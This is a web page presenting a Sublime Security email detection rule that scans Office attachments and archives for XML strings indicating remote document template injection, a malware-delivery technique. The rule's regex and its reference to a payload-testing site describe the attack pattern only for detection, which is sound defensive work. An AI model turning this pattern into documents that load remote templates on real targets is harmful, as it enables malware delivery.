Attachment: Office document loads remote document template

calendar Feb 12, 2024 · Attack surface reduction  ·
Share on: linkedin copy

Recursively scans archives and Office documents to detect remote document template injection.

Sublime rule (View on GitHub)

 1name: "Attachment: Office document loads remote document template"
 2description: |
 3    Recursively scans archives and Office documents to detect remote document template injection.
 4references:
 5  - "https://delivr.to/payloads?id=c7a7195e-0de3-428d-a32c-5fd59a3012da"
 6type: "rule"
 7severity: "medium"
 8source: |
 9  type.inbound
10  and any(attachments,
11          (
12            (
13              // office files
14              .file_extension in~ $file_extensions_macros
15              or .file_extension in~ $file_extensions_common_archives
16              or (
17                .file_extension is null
18                and .file_type == "unknown"
19                and .content_type == "application/octet-stream"
20                and .size < 100000000
21              )
22            )
23            and any(file.explode(.),
24                    .flavors.mime == "text/xml"
25                    and any(.scan.strings.strings, regex.icontains(., "Target.{0,20}http.{0,200}dotm"))
26            )
27          )
28  )  
29tags:
30  - "Attack surface reduction"
31attack_types:
32  - "Malware/Ransomware"
33detection_methods:
34  - "Archive analysis"
35  - "File analysis"
36  - "URL analysis"
37id: "d9601104-c330-5995-9fae-4d30b969c081"

Related rules

to-top